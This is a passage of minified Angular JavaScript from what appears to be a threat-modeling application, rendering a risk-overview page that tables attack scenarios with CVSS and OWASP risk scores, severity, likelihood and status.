100;",4,"ngIf"],["class","update-info",3,"backgroundColor",4,"ngIf"],["color","primary",1,"mat-button","mat-primary",2,"display","none"],["primary",""],["color","accent",1,"mat-button","mat-accent",2,"display","none"],["accent",""],["mode","indeterminate",2,"position","absolute","top","0","z-index","100"],[1,"update-info"],["mat-icon-button","","matTooltipShowDelay","1000",3,"matTooltip","click"],[2,"margin-right","5px"],[2,"margin-right","0px"]],template:function(e,i){1&e&&(ne(0,wyt,2,0,"mat-progress-bar",0),oe(1,"async"),s(2,"\n"),it(3,"router-outlet"),s(4,"\n"),it(5,"tour-step-template"),s(6,"\n"),ne(7,Iyt,19,9,"div",1),s(8,"\n"),it(9,"div",2,3),s(11,"\n"),it(12,"div",4,5)),2&e&&(V("ngIf",re(1,2,i.isLoading)),C(7),V("ngIf",!!i.dataService.NewVersionAvailable))},dependencies:[Ri,oa,da,Pa,hA,Nx,Mxe,Jv,Xi],styles:[".update-info[_ngcontent-%COMP%]{position:absolute;right:3px;bottom:27px;z-index:100;padding:10px;border-radius:5px;font-size:small}"]}),t})();const Syt=["scenariotable"];function kyt(t,a){1&t&&it(0,"app-attack-scenario",12),2&t&&V("attackScenario",B().selectedNode.data)}function Pyt(t,a){if(1&t&&(m(0,"h2"),s(1),u()),2&t){const e=B(2);C(1),ke(e.selectedNode.name())}}function Oyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Number")," "))}function Nyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.Number," ")}}function Lyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Name")," "))}function zyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",e.GetProperty("Name")," ")}}function Wyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Elements")," "))}function Fyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);Ct("selected-cell",i.IsElementSelected(e)),C(1),ct(" ",i.GetTargets(e)," ")}}function Vyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.View")," "))}function Byt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",i.GetViewName(e)," ")}}function Hyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.CvssVector")," "))}function Uyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",i.GetCvssVector(e)," ")}}function qyt(t,a){1&t&&(m(0,"th",45),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.CvssScore")," "))}function Gyt(t,a){if(1&t&&(m(0,"td",46),s(1),u()),2&t){const e=a.$implicit;C(1),ct(" ",null==e.ScoreCVSS?null:e.ScoreCVSS.Score," ")}}function jyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.OwaspRRVector")," "))}function Qyt(t,a){if(1&t&&(m(0,"td",44),s(1),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",i.GetOwaspRRVector(e)," ")}}function $yt(t,a){1&t&&(m(0,"th",45),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"report.OwaspRRScore")," "))}function Kyt(t,a){if(1&t&&(m(0,"td",46),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(2);C(1),ct(" ",re(2,1,i.GetOwaspRRScore(e))," ")}}function Xyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Severity")," "))}function Yyt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function Jyt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",47),he("ngModelChange",function(n){return Me(be(e).$implicit.Severity=n)})("change",function(){return Me(be(e).$implicit.CalculateRisk())}),s(3,"\n                        "),m(4,"option",48),s(5),oe(6,"translate"),u(),s(7,"\n                        "),ne(8,Yyt,3,4,"option",49),s(9,"\n                      "),u(),s(10,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.Severity),C(2),V("value",0),C(1),ke(re(6,4,"properties.selectNone")),C(3),V("ngForOf",i.GetSeverityTypes())}}function Zyt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"general.Likelihood")," "))}function ebt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetLMHName(e)))}}function tbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",47),he("ngModelChange",function(n){return Me(be(e).$implicit.Likelihood=n)})("change",function(){return Me(be(e).$implicit.CalculateRisk())}),s(3,"\n                        "),m(4,"option",48),s(5),oe(6,"translate"),u(),s(7,"\n                        "),ne(8,ebt,3,4,"option",49),s(9,"\n                      "),u(),s(10,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.Likelihood),C(2),V("value",0),C(1),ke(re(6,4,"properties.selectNone")),C(3),V("ngForOf",i.GetLMHValues())}}function ibt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Risk")," "))}function abt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetSeverityTypeName(e)))}}function nbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",50),he("ngModelChange",function(n){return Me(be(e).$implicit.Risk=n)}),s(3,"\n                        "),ne(4,abt,3,4,"option",49),s(5,"\n                      "),u(),s(6,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.Risk),C(2),V("ngForOf",i.GetSeverityTypes())}}function obt(t,a){1&t&&(m(0,"th",43),s(1),oe(2,"translate"),u()),2&t&&(C(1),ct(" ",re(2,1,"properties.Status")," "))}function rbt(t,a){if(1&t&&(m(0,"option",48),s(1),oe(2,"translate"),u()),2&t){const e=a.$implicit,i=B(3);V("value",e),C(1),ke(re(2,2,i.GetThreatStateName(e)))}}function sbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1,"\n                      "),m(2,"select",51),he("ngModelChange",function(n){return Me(be(e).$implicit.ThreatState=n)}),s(3,"\n                        "),ne(4,rbt,3,4,"option",49),s(5,"\n                      "),u(),s(6,"\n                    "),u()}if(2&t){const e=a.$implicit,i=B(2);C(2),V("ngModel",e.ThreatState),C(2),V("ngForOf",i.GetThreatStates())}}function cbt(t,a){1&t&&(m(0,"th",52),s(1," "),u())}function lbt(t,a){if(1&t){const e=Ye();m(0,"td",44),s(1," "),m(2,"mat-icon",53),he("click",function(n){const c=be(e).$implicit;return Me(B(2).OpenContextMenu(n,c))}),oe(3,"translate"),s(4,"more_vert"),u(),s(5," "),u()}2&t&&(C(2),at("matTooltip",re(3,1,"general.More")))}function dbt(t,a){1&t&&it(0,"tr",54)}function mbt(t,a){if(1&t){const e=Ye();m(0,"tr",55),he("click",function(){const r=be(e).$implicit;return Me(B(2).SelectScenario(r))})("dblclick",function(){const r=be(e).$implicit;return Me(B(2).OnScenarioDblClick(r))})("contextmenu",function(n){const c=be(e).$implicit;return Me(B(2).OpenContextMenu(n,c))}),s(1,"\n                  "),u()}if(2&t){const e=a.$implicit;Ct("selected-entry",B(2).IsScenarioSelected(e)),V("id",e.ID)}}function ubt(t,a){if(1&t){const e=Ye();m(0,"tr",56),s(1,"\n                    "),m(2,"td",57),he("contextmenu",function(n){return be(e),Me(B(2).OpenContextMenu(n,null))}),s(3),oe(4,"translate"),u(),s(5,"\n                  "),u()}2&t&&(C(3),ke(re(4,1,"pages.modeling.threattable.noThreats")))}function hbt(t,a){if(1&t&&(m(0,"span",60),s(1),u()),2&t){const e=B().item;C(1),ke(e.GetProperty("Name"))}}function fbt(t,a){1&t&&(m(0,"span",60),s(1),oe(2,"translate"),u()),2&t&&(C(1),ke(re(2,1,"pages.modeling.threattable.noEntrySelected")))}function pbt(t,a){if(1&t){const e=Ye();s(0,"\n                    "),ne(1,hbt,2,1,"span",58),s(2," \n                    "),ne(3,fbt,3,3,"span",58),s(4,"\n                    "),m(5,"button",59),he("click",function(){const r=be(e).item;return Me(B(2).OnScenarioDblClick(r))}),s(6,"\n                      "),m(7,"mat-icon"),s(8,"edit"),u(),s(9,"\n                      "),m(10,"span"),s(11),oe(12,"translate"),u(),s(13,"\n                    "),u(),s(14,"\n                  ")}if(2&t){const e=a.item;C(1),V("ngIf",e),C(2),V("ngIf",!e),C(2),V("disabled",!e),C(6),ke(re(12,4,"pages.modeling.threattable.editEntry"))}}function _bt(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n              "),ne(2,Pyt,2,1,"h2",11),s(3,"\n              "),m(4,"span",13),s(5),oe(6,"translate"),oe(7,"translate"),u(),s(8,"\n              "),m(9,"input",14),he("keyup",function(n){return be(e),Me(B().ApplyScenarioFilter(n))}),oe(10,"translate"),u(),s(11,"\n              "),m(12,"div",15),s(13,"\n                "),m(14,"table",16,17),s(16,"\n                  "),bt(17,18),s(18,"\n                    "),ne(19,Oyt,3,3,"th",19),s(20,"\n                    "),ne(21,Nyt,2,1,"td",20),s(22,"\n                  "),Mt(),s(23,"\n                  "),bt(24,21),s(25,"\n                    "),ne(26,Lyt,3,3,"th",19),s(27,"\n                    "),ne(28,zyt,2,1,"td",20),s(29,"\n                  "),Mt(),s(30,"\n                  "),bt(31,22),s(32,"\n                    "),ne(33,Wyt,3,3,"th",19),s(34,"\n                    "),ne(35,Fyt,2,3,"td",23),s(36,"\n                  "),Mt(),s(37,"\n                  "),bt(38,24),s(39,"\n                    "),ne(40,Vyt,3,3,"th",19),s(41,"\n                    "),ne(42,Byt,2,1,"td",20),s(43,"\n                  "),Mt(),s(44,"\n                  "),bt(45,25),s(46,"\n                    "),ne(47,Hyt,3,3,"th",19),s(48,"\n                    "),ne(49,Uyt,2,1,"td",20),s(50,"\n                  "),Mt(),s(51,"\n                  "),bt(52,26),s(53,"\n                    "),ne(54,qyt,3,3,"th",27),s(55,"\n                    "),ne(56,Gyt,2,1,"td",28),s(57,"\n                  "),Mt(),s(58,"\n                  "),bt(59,29),s(60,"\n                    "),ne(61,jyt,3,3,"th",19),s(62,"\n                    "),ne(63,Qyt,2,1,"td",20),s(64,"\n                  "),Mt(),s(65,"\n                  "),bt(66,30),s(67,"\n                    "),ne(68,$yt,3,3,"th",27),s(69,"\n                    "),ne(70,Kyt,3,3,"td",28),s(71,"\n                  "),Mt(),s(72,"\n                  "),bt(73,31),s(74,"\n                    "),ne(75,Xyt,3,3,"th",19),s(76,"\n                    "),ne(77,Jyt,11,6,"td",20),s(78,"\n                  "),Mt(),s(79,"\n                  "),bt(80,32),s(81,"\n                    "),ne(82,Zyt,3,3,"th",19),s(83,"\n                    "),ne(84,tbt,11,6,"td",20),s(85,"\n                  "),Mt(),s(86,"\n                  "),bt(87,33),s(88,"\n                    "),ne(89,ibt,3,3,"th",19),s(90,"\n                    "),ne(91,nbt,7,2,"td",20),s(92,"\n                  "),Mt(),s(93,"\n                  "),bt(94,34),s(95,"\n                    "),ne(96,obt,3,3,"th",19),s(97,"\n                    "),ne(98,sbt,7,2,"td",20),s(99,"\n                  "),Mt(),s(100,"\n                  "),bt(101,35),s(102,"\n                    "),ne(103,cbt,2,0,"th",36),s(104,"\n                    "),ne(105,lbt,6,3,"td",20),s(106,"\n                  "),Mt(),s(107,"\n              \n                  "),ne(108,dbt,1,0,"tr",37),s(109,"\n                  "),ne(110,mbt,2,3,"tr",38),s(111,"\n                  "),ne(112,ubt,6,3,"tr",39),s(113,"\n                "),u(),s(114,"\n                "),it(115,"div",40),s(116," \n                "),m(117,"mat-menu",null,41),s(119," \n                  "),ne(120,pbt,15,6,"ng-template",42),s(121," \n                "),u(),s(122,"\n              "),u(),s(123,"\n            "),Mt()}if(2&t){const e=Ti(118),i=B();C(2),V("ngIf",i.selectedNode),C(3),Y_("",re(6,25,"pages.dashboard.ThreatOverview"),": ",i.AttackScenarios.length," ",re(7,27,"general.AttackScenarios"),""),C(4),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(10,29,"pages.modeling.filter")),V("spellcheck",i.dataService.HasSpellCheck),C(5),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceScenarios),C(94),V("matHeaderRowDef",i.displayedScenarioColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedScenarioColumns),C(5),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",e)}}const gbt=[{path:"risk",component:(()=>{class t extends CT{constructor(e,i,n,r,c,d){super(),this.theme=e,this.dataService=i,this.translate=n,this.locStorage=r,this.dialog=c,this.router=d,this._attackScenarios=[],this.menuTopLeftPosition={x:"0",y:"0"},this.displayedScenarioColumns=[],this.dataService.Project||this.router.navigate(["/home"],{queryParams:{origin:"risk"}})}get selectedNode(){return this._selectedNode}set selectedNode(e){if(this._selectedNode=e,this.AttackScenarios=[],e){const i=[],n=r=>{r.data instanceof Rc?i.push(r.data):r.children&&r.children.forEach(c=>n(c))};n(e),this.AttackScenarios=i}}get sortScenarios(){return this._sortScenarios}set sortScenarios(e){this._sortScenarios=e,this.dataSourceScenarios&&(this.dataSourceScenarios.sort=e)}get AttackScenarios(){return this._attackScenarios}set AttackScenarios(e){this._attackScenarios=e;const r=["number","name","elements"];[...new Set(e.map(c=>c.ViewID))].length>1&&r.push("view"),e.some(c=>null!=this.GetCvssVector(c))&&r.push("cvssVector"),e.some(c=>c.ScoreCVSS&&c.ScoreCVSS.Score)&&r.push("cvssScore"),e.some(c=>null!=this.GetOwaspRRVector(c))&&r.push("owaspVector"),e.some(c=>c.ScoreOwaspRR&&c.ScoreOwaspRR.Score)&&r.push("owaspScore"),r.push("severity","likelihood","risk","status","more"),this.displayedScenarioColumns=r,this.dataSourceScenarios=new zd(e),this.dataSourceScenarios.sort=this.sortScenarios,this.dataSourceScenarios.sortingDataAccessor=(c,d)=>{var T,k,q;return"number"==d?Number(c.Number):"name"==d?c.Name:"elements"==d?this.GetTargets(c):"view"==d?this.dataService.Project.GetView(c.ViewID).Name:"severity"==d?c.Severity:"cvssVector"==d?null===(T=c.ScoreCVSS)||void 0===T?void 0:T.Vector:"cvssScore"==d?null===(k=c.ScoreCVSS)||void 0===k?void 0:k.Score:"owaspVector"==d?this.GetOwaspRRVector(c):"owaspScore"==d?null===(q=c.ScoreOwaspRR)||void 0===q?void 0:q.Score:"likelihood"==d?c.Likelihood:"risk"==d?c.Risk:"status"==d?c.ThreatState:void console.error("Missing sorting header",d)},this.dataSourceScenarios.filterPredicate=(c,d)=>{var T,k;let q=d.trim().toLowerCase(),Y=c.Name.toLowerCase().indexOf(q);return-1==Y&&(Y=null===(T=c.AttackVector)||void 0===T?void 0:T.Name.toLowerCase().indexOf(q)),-1==Y&&(Y=null===(k=this.GetTargets(c))||void 0===k?void 0:k.toLowerCase().indexOf(q)),null!=Y&&-1!=Y},this.sortScenarios&&this.sortScenarios.sortChange.emit(this.sortScenarios)}get selectedScenario(){return this._selectedScenario}set selectedScenario(e){this._selectedScenario=e}ngAfterViewInit(){setTimeout(()=>{this.createNodes(),this.selectedNode=this.nodes[0]})}onKeyDown(e){var i;if(!this.IsAttackScenario()&&"TEXTAREA"!=(null===(i=document.activeElement)||void 0===i?void 0:i.tagName)){if(this.selectedScenario){const n=(r,c)=>{this.SelectScenario(r[c]);const d=this.rows.find(T=>T.nativeElement.id===r[c].ID);null==d||d.nativeElement.scrollIntoView({block:"center",behavior:"smooth"})};if("ArrowDown"==e.key){const r=this.dataSourceScenarios.sortData(this.dataSourceScenarios.filteredData,this.sortScenarios),c=r.indexOf(this.selectedScenario);c<r.length-1&&n(r,c+1)}else if("ArrowUp"==e.key){const r=this.dataSourceScenarios.sortData(this.dataSourceScenarios.filteredData,this.sortScenarios),c=r.indexOf(this.selectedScenario);c>0&&n(r,c-1)}}["ArrowDown","ArrowUp"].includes(e.key)&&(e.preventDefault(),e.stopImmediatePropagation())}}ApplyScenarioFilter(e){this.dataSourceScenarios.filter=e.target.value.trim().toLowerCase()}OnScenarioDblClick(e){this.dialog.OpenAttackScenarioDialog(e,!1,this.dataSourceScenarios.sortData(this.dataSourceScenarios.filteredData,this.sortScenarios))}IsAttackScenario(){var e;return(null===(e=this.selectedNode)||void 0===e?void 0:e.data)instanceof Rc}IsScenarioSelected(e){return this.selectedScenario==e}SelectScenario(e){this.selectedScenario=e}IsElementSelected(e){return e&&this.selectedScenario&&e.Targets.some(i=>this.selectedScenario.Targets.includes(i))}GetTargets(e){return e.Targets.filter(i=>i).map(i=>i.GetProperty("Name")).join(", ")}GetViewName(e){var i;return null===(i=this.dataService.Project.GetView(e.ViewID))||void 0===i?void 0:i.Name}GetCvssVector(e){if(e.ScoreCVSS){const i=Wm.GetVector(e.ScoreCVSS);if((null==i?void 0:i.length)>8)return i}return null}GetOwaspRRVector(e){return e.ScoreOwaspRR?IT.GetVector(e.ScoreOwaspRR):null}GetOwaspRRScore(e){var i;return null!==(i=e.ScoreOwaspRR)&&void 0!==i&&i.Score?vn.ToString(e.ScoreOwaspRR.Score):null}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}GetSeverityTypes(){return vn.GetTypesDashboard()}GetSeverityTypeName(e){return vn.ToString(e)}GetLMHValues(){return An.GetKeys()}GetLMHName(e){return An.ToString(e)}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}GetSplitSize(e,i,n){let r=this.locStorage.Get(si.PAGE_RISK_SPLIT_SIZE_X+e.toString());return null!=r?Number(JSON.parse(r)[i]):n}OnSplitSizeChange(e,i){this.locStorage.Set(si.PAGE_RISK_SPLIT_SIZE_X+i.toString(),JSON.stringify(e.sizes))}createNodes(){const e=this.nodes;this.nodes=[];const i=this.dataService.Project,r={name:()=>this.translate.instant("general.RiskAssessment"),icon:"crisis_alert",canSelect:!0,hasMenu:!0,children:[]},c=[];i.GetSysContext().ContextDiagram&&c.push(i.GetSysContext().ContextDiagram),i.GetSysContext().UseCaseDiagram&&c.push(i.GetSysContext().UseCaseDiagram),i.GetDevices().forEach(d=>{d.HardwareDiagram&&c.push(d.HardwareDiagram),d.SoftwareStack&&c.push(d.SoftwareStack),d.ProcessStack&&c.push(d.ProcessStack)}),i.GetMobileApps().forEach(d=>{d.SoftwareStack&&c.push(d.SoftwareStack),d.ProcessStack&&c.push(d.ProcessStack)}),i.GetDFDiagrams().forEach(d=>c.push(d)),c.forEach(d=>{const T=i.GetAttackScenariosApplicable().filter(k=>k.ViewID==d.ID);if(T.length>0){const k={name:()=>d.Name,canSelect:!0,children:[]};T.forEach(q=>k.children.push((d=>({name:()=>"AS"+d.Number+") "+d.Name,canSelect:!0,data:d}))(q))),r.children.push(k)}}),this.nodes.push(r),xa.TransferExpandedState(e,this.nodes),this.navTree.SetNavTreeData(this.nodes)}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(Sn),Ee(_r),Ee(Wn),Ee(Oo))},t.\u0275cmp=Wt({type:t,selectors:[["app-risk-overview"]],viewQuery:function(e,i){if(1&e&&(Mi(Syt,5),Mi(po,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.sortScenarios=n.first),Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,$c)},features:[ci],decls:35,vars:22,consts:[[1,"website-container"],[1,"drawer-container"],["mode","side","opened","",2,"border-right-width","0px"],["selectedRoute","/risk",2,"width","100%","height","calc(100% - 20px)",3,"sameRoute"],["direction","horizontal","unit","pixel",3,"gutterSize","restrictMove","dragEnd"],[3,"size","visible","order"],[3,"activeNode","selectedNodeChanged"],["navTree",""],[3,"size","order"],[2,"margin-left","10px","height","calc(100% - 22px)"],["style","height: 100%; display: block; margin: 10px 10px 0 0;",3,"attackScenario",4,"ngIf"],[4,"ngIf"],[2,"height","100%","display","block","margin","10px 10px 0 0",3,"attackScenario"],[2,"margin-left","5px","margin-top","2px"],["matInput","",1,"filterInput",3,"spellcheck","placeholder","keyup"],[2,"height","calc(100% - 70px)"],["mat-table","","matSort","","matSortActive","number","matSortDirection","asc","matSortDisableClear","",2,"width","100%","overflow","auto","display","block","height","calc(100% - 10px)",3,"dataSource"],["scenariotable","matSort"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","name"],["matColumnDef","elements"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","view"],["matColumnDef","cvssVector"],["matColumnDef","cvssScore"],["mat-header-cell","","mat-sort-header","","style","text-align: center;",4,"matHeaderCellDef"],["mat-cell","","style","text-align: center;",4,"matCellDef"],["matColumnDef","owaspVector"],["matColumnDef","owaspScore"],["matColumnDef","severity"],["matColumnDef","likelihood"],["matColumnDef","risk"],["matColumnDef","status"],["matColumnDef","more"],["mat-header-cell","",4,"matHeaderCellDef"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-entry","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mat-header-cell","","mat-sort-header",""],["mat-cell",""],["mat-header-cell","","mat-sort-header","",2,"text-align","center"],["mat-cell","",2,"text-align","center"],[2,"width","80px",3,"ngModel","ngModelChange","change"],[3,"value"],[3,"value",4,"ngFor","ngForOf"],[2,"width","80px","pointer-events","none",3,"ngModel","ngModelChange"],[2,"width","130px",3,"ngModel","ngModelChange"],["mat-header-cell",""],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","12",1,"mat-cell",3,"contextmenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],[2,"margin-left","20px","margin-right","20px"]],template:function(e,i){1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"mat-drawer-container",1),s(3,"\n    "),m(4,"mat-drawer",2),s(5,"\n      "),m(6,"app-side-nav",3),he("sameRoute",function(){return i.OnSameRoute()}),u(),s(7,"\n    "),u(),s(8,"\n\n    "),m(9,"mat-drawer-content"),s(10,"\n      "),m(11,"as-split",4),he("dragEnd",function(r){return i.OnSplitSizeChange(r,1)}),s(12,"\n        "),m(13,"as-split-area",5),s(14,"\n          "),m(15,"app-nav-tree",6,7),he("selectedNodeChanged",function(r){return i.selectedNode=r}),u(),s(17,"\n        "),u(),s(18,"\n        "),m(19,"as-split-area",8),s(20,"\n          "),m(21,"div",9),s(22,"\n            "),ne(23,kyt,1,1,"app-attack-scenario",10),s(24,"\n            "),ne(25,_bt,124,31,"ng-container",11),s(26,"\n          "),u(),s(27,"\n        "),u(),s(28,"\n      "),u(),s(29,"\n    "),u(),s(30,"\n  "),u(),s(31,"\n  "),it(32,"app-status-bar"),s(33,"\n"),u(),s(34,"\n")),2&e&&(C(9),Ct("splitter-light2",!i.theme.IsDarkMode)("splitter-dark2",i.theme.IsDarkMode),C(2),V("gutterSize",3)("restrictMove",!0),C(2),Ct("splitter-light1",!i.theme.IsDarkMode)("splitter-dark1",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,0,350))("visible",i.showLeftBar)("order",1),C(2),V("activeNode",i.selectedNode),C(4),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("size",i.GetSplitSize(1,1,"*"))("order",2),C(4),V("ngIf",i.IsAttackScenario()),C(2),V("ngIf",i.selectedNode&&null==i.selectedNode.data))},dependencies:[Zi,Ri,pm,_m,Ed,Ta,Ea,Zh,Dp,oa,_u,gu,Nd,Xa,Xo,qo,po,el,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,Cp,al,bp,pf,_f,df,lM,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}.primary-color[_ngcontent-%COMP%], .selected-entry[_ngcontent-%COMP%]   td[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     